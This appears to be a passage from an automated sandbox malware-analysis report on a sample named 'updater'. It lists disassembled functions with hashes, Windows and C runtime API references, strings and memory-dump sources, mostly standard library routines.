API String ID: 2404127365-2658103896
Opcode ID: 7da9dfa8c9d5974315323d6877e7a4da626f0412bbff0911c91f60c880b7a9dc
Instruction ID: 084b8613e9855165ee590a62833492e2a96b4cb636c1e0c7f069a100cb43cc5b
Opcode Fuzzy Hash: 7da9dfa8c9d5974315323d6877e7a4da626f0412bbff0911c91f60c880b7a9dc
Instruction Fuzzy Hash: 8E213DB5C00384AADF15EFAAC844D9EBBB8EF95700F10845FE9159B2A5E6709540CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01428881 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 014288AB
_free.LIBCMT ref: 01428984
_free.LIBCMT ref: 014289B1

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 7e9f3535bd859882e35b96b2546844b1baaa56361f9eca4ad0b4279fb2ef4177
Instruction ID: 9863b8262b6dd787c0b6682044683d66ef5a61e7061a1aee4297cebce6c22f3d
Opcode Fuzzy Hash: 7e9f3535bd859882e35b96b2546844b1baaa56361f9eca4ad0b4279fb2ef4177
Instruction Fuzzy Hash: 6E51D971A043276FEB21AFB99880A6EBBF4AF11320F94415FE510973B2EE7585C18B51

Uniqueness

Uniqueness Score: -1.00%

Function 0141EE41 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 0142049B: GetLastError.KERNEL32(?,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 014204A0
Part of subcall function 0142049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01412F7E,?,?,?,?,01413E8D,?), ref: 0142053E

_free.LIBCMT ref: 0141F14E
_free.LIBCMT ref: 0141F167
_free.LIBCMT ref: 0141F1A5
_free.LIBCMT ref: 0141F1AE
_free.LIBCMT ref: 0141F1BA

Strings

C, xrefs: 0141EF9D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 18e54dcbdb68f136d7ced2faec874799b8768f80ec6a68050ee4d2f4ec71bc20
Instruction ID: 26d0841f6abe3ff04a1975fbef52bcf45c23142634fbaf82f0635110720a3a8a
Opcode Fuzzy Hash: 18e54dcbdb68f136d7ced2faec874799b8768f80ec6a68050ee4d2f4ec71bc20
Instruction Fuzzy Hash: 38B16C75A0122A9FDB25DF18C894AAEB7B4FF18314F5041EEE909A7364D731AE85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0140D67B Relevance: 10.7, APIs: 7, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 0140D706
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0140D794
__alloca_probe_16.LIBCMT ref: 0140D7BE
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0140D806
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0140D820
__alloca_probe_16.LIBCMT ref: 0140D846
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0140D883

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$Info
String ID:
API String ID: 2298828789-0
Opcode ID: 74c7a2a92713fc75f832136a2f465840584acee2e2a8644b43fe806119c8d4ab
Instruction ID: d19f0420bb12d72ce7655acf39f0c68e759e31b38d748d760eafe185ce34af85
Opcode Fuzzy Hash: 74c7a2a92713fc75f832136a2f465840584acee2e2a8644b43fe806119c8d4ab
Instruction Fuzzy Hash: 30719372D102569AEF229EEA8C40AEF7FB5AF15650F18043BE954A72F0D7358908CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0140EFD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0140F007
___except_validate_context_record.LIBVCRUNTIME ref: 0140F00F
_ValidateLocalCookies.LIBCMT ref: 0140F098
__IsNonwritableInCurrentImage.LIBCMT ref: 0140F0C3
_ValidateLocalCookies.LIBCMT ref: 0140F118

Strings

csm, xrefs: 0140F0AD

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: d01e5679290d39b007f30c0e67a3445dc576cc2a27dd4c34b3fc0cd1ec0b4c07
Instruction ID: e15f6e3a7b307de7f3b6cff2d091b79e428c88459b75510885e9d77a06210b63
Opcode Fuzzy Hash: d01e5679290d39b007f30c0e67a3445dc576cc2a27dd4c34b3fc0cd1ec0b4c07
Instruction Fuzzy Hash: 8641E774A00209EFCF21DF2AC840A9E7FB5EF54214F14817BEA14AB3B5D7319A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B18A4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 013B18B7

Part of subcall function 013FA7A9: std::_Lockit::_Lockit.LIBCPMT ref: 013FA7BB
Part of subcall function 013FA7A9: std::locale::_Setgloballocale.LIBCPMT ref: 013FA7D6
Part of subcall function 013FA7A9: _Yarn.LIBCPMT ref: 013FA7EC
Part of subcall function 013FA7A9: std::_Lockit::~_Lockit.LIBCPMT ref: 013FA82C

std::_Lockit::_Lockit.LIBCPMT ref: 013B18D8
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 013B191C
std::locale::_Locimp::_Makeloc.LIBCPMT ref: 013B1952

Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F8FE1
Part of subcall function 013F8FBF: ctype.LIBCPMT ref: 013F9001
Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F900D
Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F9037
Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F9065
Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F9072
Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F9099
Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F90A6
Part of subcall function 013F8FBF: std::locale::_Locimp::_Locimp_Addfac.LIBCPMT ref: 013F90ED
Part of subcall function 013F8FBF: int.LIBCPMT ref: 013F914D

_Yarn.LIBCPMT ref: 013B196F

Strings

bad locale name, xrefs: 013B19B7

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::locale::_$Locimp::_$AddfacLocimp_std::_$Lockit$Lockit::_Yarn$InitLocinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocalectype
String ID: bad locale name
API String ID: 2393377010-1405518554
Opcode ID: ebd63902e3cc31a109a786cb3d6c27bb90fb4deaddd3715df4775027a7d5e98d
Instruction ID: 56618c8066e9b92fb8312133b7e9f1ee6ddbbadfe8c7c1eab9b4619320ceafb7
Opcode Fuzzy Hash: ebd63902e3cc31a109a786cb3d6c27bb90fb4deaddd3715df4775027a7d5e98d
Instruction Fuzzy Hash: 90419E71D00249EFDB04DFECE480BDEBBB4AF29318F14416DE255A3691D7705A04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D37DD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?), ref: 013D3823
_strlen.LIBCMT ref: 013D387C
_strlen.LIBCMT ref: 013D38B9

Strings

\, xrefs: 013D3884
%s\etilqs_, xrefs: 013D38A9

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen$PathTemp
String ID: %s\etilqs_$\
API String ID: 1134129140-699725532
Opcode ID: f5c4f8807a65b488feb28f7266779200c6abedae07da91235618d04abe4af0ba
Instruction ID: bfa9bda563678636affb20e90922f0242965d3d6ebd8b1a8190f134ed10a9752
Opcode Fuzzy Hash: f5c4f8807a65b488feb28f7266779200c6abedae07da91235618d04abe4af0ba
Instruction Fuzzy Hash: 0E313EF390425A5FF720966CFC45EFB3BACBF60218F1404A9E445D6181EA70DE488762

Uniqueness

Uniqueness Score: -1.00%

Function 014217B1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 014217F9
__fassign.LIBCMT ref: 014219D8
__fassign.LIBCMT ref: 014219F5
WriteFile.KERNEL32(?,00000001,00000000,?,00000000), ref: 01421A3D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01421A7D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01421B29

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 83ecf3b2bfe126f561635062a579951e1a25e3d8e4249a39dea71155bc466af0
Instruction ID: fa2066a2419c6cc65b544c49752956cff8f8dab304d3a2f343073b15721f8912
Opcode Fuzzy Hash: 83ecf3b2bfe126f561635062a579951e1a25e3d8e4249a39dea71155bc466af0
Instruction Fuzzy Hash: 64D19D75D002A99FCF15CFA8C8809EDFBB5FF48714F68016AE855BB351E630A986CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01431440 Relevance: 9.3, APIs: 6, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 01431554
__FindPESection.LIBCMT ref: 01431571
VirtualQuery.KERNEL32(83000000,4350CDAC,0000001C,4350CDAC,?,?,?), ref: 01431656
__FindPESection.LIBCMT ref: 01431693
_ValidateScopeTableHandlers.LIBCMT ref: 014316B3
__FindPESection.LIBCMT ref: 014316CD

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
String ID:
API String ID: 2529200597-0
Opcode ID: cfe0c55b618dcd820dbf13961ce2170fec7a304a35aa06200884639b1a1187d5
Instruction ID: 1d3a8f83a0135231f217f0b2aaa7a985dca11e94f537420e44b06f48d980e755
Opcode Fuzzy Hash: cfe0c55b618dcd820dbf13961ce2170fec7a304a35aa06200884639b1a1187d5
Instruction Fuzzy Hash: EBA1B475F002058BDB21CF9DD9806AEB7A5EB8CB50F19422BE909973B5D735EC01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013CEAE4 Relevance: 9.1, APIs: 6, Instructions: 128COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013CEAF7
int.LIBCPMT ref: 013CEB0E

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

std::_Facet_Register.LIBCPMT ref: 013CEB48
std::_Lockit::~_Lockit.LIBCPMT ref: 013CEB5E
Concurrency::cancel_current_task.LIBCPMT ref: 013CEB73
_Deallocate.LIBCONCRT ref: 013CEC3C

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_Register
String ID:
API String ID: 55420841-0
Opcode ID: 5706205587b92ba6387539829d537b645e87c0b848135b9fdad3ebb925ffa180
Instruction ID: aa473005b12511eae55ca36de30ff11d4bcc00ee91422934b22b25c02eaba51b
Opcode Fuzzy Hash: 5706205587b92ba6387539829d537b645e87c0b848135b9fdad3ebb925ffa180
Instruction Fuzzy Hash: 1941C676A002069FCB24DF6CD4849AEBBF5FF54724B24462DE966D7390DB30AE40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 014110B9 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,014110B0,01410EE6,0140E5FE), ref: 014110C7
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 014110D5
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 014110EE
SetLastError.KERNEL32(00000000,014110B0,01410EE6,0140E5FE), ref: 01411140

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: b819d862eb53b228bf40ad7b1f3428042ad3692dd21d4a70e570b2d4620246fc
Instruction ID: 43deeacd564803fd30d5cb6f0a8e0b78f645acfca4854d15e1ed673c8265f71e
Opcode Fuzzy Hash: b819d862eb53b228bf40ad7b1f3428042ad3692dd21d4a70e570b2d4620246fc
Instruction Fuzzy Hash: 5B01DDB221A3135EAB25277D6C84D6B6A56EB36DB4730432FE310855FDEFB144019250

Uniqueness

Uniqueness Score: -1.00%

Function 013D36E9 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 013D3721
GetFileAttributesW.KERNEL32(00000000), ref: 013D3728

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 76bf9b1854f053ec13da80b459bcba266cbcabc33c73190ad063fe99673eebe5
Instruction ID: 735b4677b4609787294b1d3d8fd39274fdf1dd846797af989083d63d07801bcc
Opcode Fuzzy Hash: 76bf9b1854f053ec13da80b459bcba266cbcabc33c73190ad063fe99673eebe5
Instruction Fuzzy Hash: BB01FCFB206E179FC7252A7CBCC466E3A697F46679B120615F663CA1C1CA34CD0143A7

Uniqueness

Uniqueness Score: -1.00%

Function 013FC133 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC144
int.LIBCPMT ref: 013FC15B

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

messages.LIBCPMT ref: 013FC17E
std::_Facet_Register.LIBCPMT ref: 013FC195
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC1B5
Concurrency::cancel_current_task.LIBCPMT ref: 013FC1C2

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: a3dd5eb84e78998809504382bedcdfb35852d68d0698a3aa906a6cdfa77ffdf0
Instruction ID: 3a04ad2effd14efdc15204dec2797d2b59151e9ab64ea5222ee415f6e180a936
Opcode Fuzzy Hash: a3dd5eb84e78998809504382bedcdfb35852d68d0698a3aa906a6cdfa77ffdf0
Instruction Fuzzy Hash: A701D675D0011A9BCB15EB68D854AFD7B75BFA4718F14040EEA00A73E0DF749E45CB81

Uniqueness

Uniqueness Score: -1.00%

Function 013FC009 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC01A
int.LIBCPMT ref: 013FC031

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

ctype.LIBCPMT ref: 013FC054
std::_Facet_Register.LIBCPMT ref: 013FC06B
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC08B
Concurrency::cancel_current_task.LIBCPMT ref: 013FC098

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
String ID:
API String ID: 3097546199-0
Opcode ID: e1b7cff0efdeed6f45ac3803ea02e9953f958da0c87a1c89b035786e9b4ff47d
Instruction ID: 41fdba0c8be29a8b1280bee4d4abf2200b4ed77e0e4b7a382937176d32554411
Opcode Fuzzy Hash: e1b7cff0efdeed6f45ac3803ea02e9953f958da0c87a1c89b035786e9b4ff47d
Instruction Fuzzy Hash: 2601C47590011A9BCB15EB68D854EBDBB74BFA5318F18450DDA10A73E0DF34DE45C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FC09E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC0AF
int.LIBCPMT ref: 013FC0C6

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

messages.LIBCPMT ref: 013FC0E9
std::_Facet_Register.LIBCPMT ref: 013FC100
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC120
Concurrency::cancel_current_task.LIBCPMT ref: 013FC12D

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: efbe3e6a58c7747b28f03bd5260e6fb50941552246b2fe15854302249ca91801
Instruction ID: da68b4d09dfa2209383b430874ca1c3ea06332b88eb53e98b51c19f92dcc487e
Opcode Fuzzy Hash: efbe3e6a58c7747b28f03bd5260e6fb50941552246b2fe15854302249ca91801
Instruction Fuzzy Hash: 8201C07590011A9BCB05AB68D854EADBB74BFA4358F28400DEA10A72E1DF74DE05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013FC546 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC557
int.LIBCPMT ref: 013FC56E

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

moneypunct.LIBCPMT ref: 013FC591
std::_Facet_Register.LIBCPMT ref: 013FC5A8
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC5C8
Concurrency::cancel_current_task.LIBCPMT ref: 013FC5D5

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 13af2bf3fb168c788d6de2367d5c495a6ed6ab7c86c3e47b06c6f3432602f850
Instruction ID: becdfe22902d3ed89c2c742372ea80fe4b9482504ef40fb88ff11d81c6bbd2c3
Opcode Fuzzy Hash: 13af2bf3fb168c788d6de2367d5c495a6ed6ab7c86c3e47b06c6f3432602f850
Instruction Fuzzy Hash: 8501D676D0021ADBCB01EBB8D854ABD7B75BFA4328F14000DEA14672D0DF749E45C781

Uniqueness

Uniqueness Score: -1.00%

Function 013FC5DB Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013FC5EC
int.LIBCPMT ref: 013FC603

Part of subcall function 013B1837: std::_Lockit::_Lockit.LIBCPMT ref: 013B1848
Part of subcall function 013B1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013B1862

moneypunct.LIBCPMT ref: 013FC626
std::_Facet_Register.LIBCPMT ref: 013FC63D
std::_Lockit::~_Lockit.LIBCPMT ref: 013FC65D
Concurrency::cancel_current_task.LIBCPMT ref: 013FC66A

Memory Dump Source

Source File: 00000001.00000002.1124683617.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000001.00000002.1124680121.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124742454.0000000001437000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124757833.0000000001452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1124765244.0000000001457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13b0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermoneypunct
String ID:
API String ID: 1973839345-0
Opcode ID: 9f6f237a205a8ea2cead91708375f25a6df6a927c27da2f912ef0c1a6657ff23
Instruction ID: f4ebb41763e1b747fadbd87c32c4304619a419e2ff37b442001702f7a1d57f03
Opcode Fuzzy Hash: 9f6f237a205a8ea2cead91708375f25a6df6a927c27da2f912ef0c1a6657ff23
Instruction Fuzzy Hash: 7F01D675D0011A9BCB05EB68D854EBDBB71BFA4728F28040DEA11672D1DF749E01C781

Uniqueness

Uniqueness Score: -1.00%

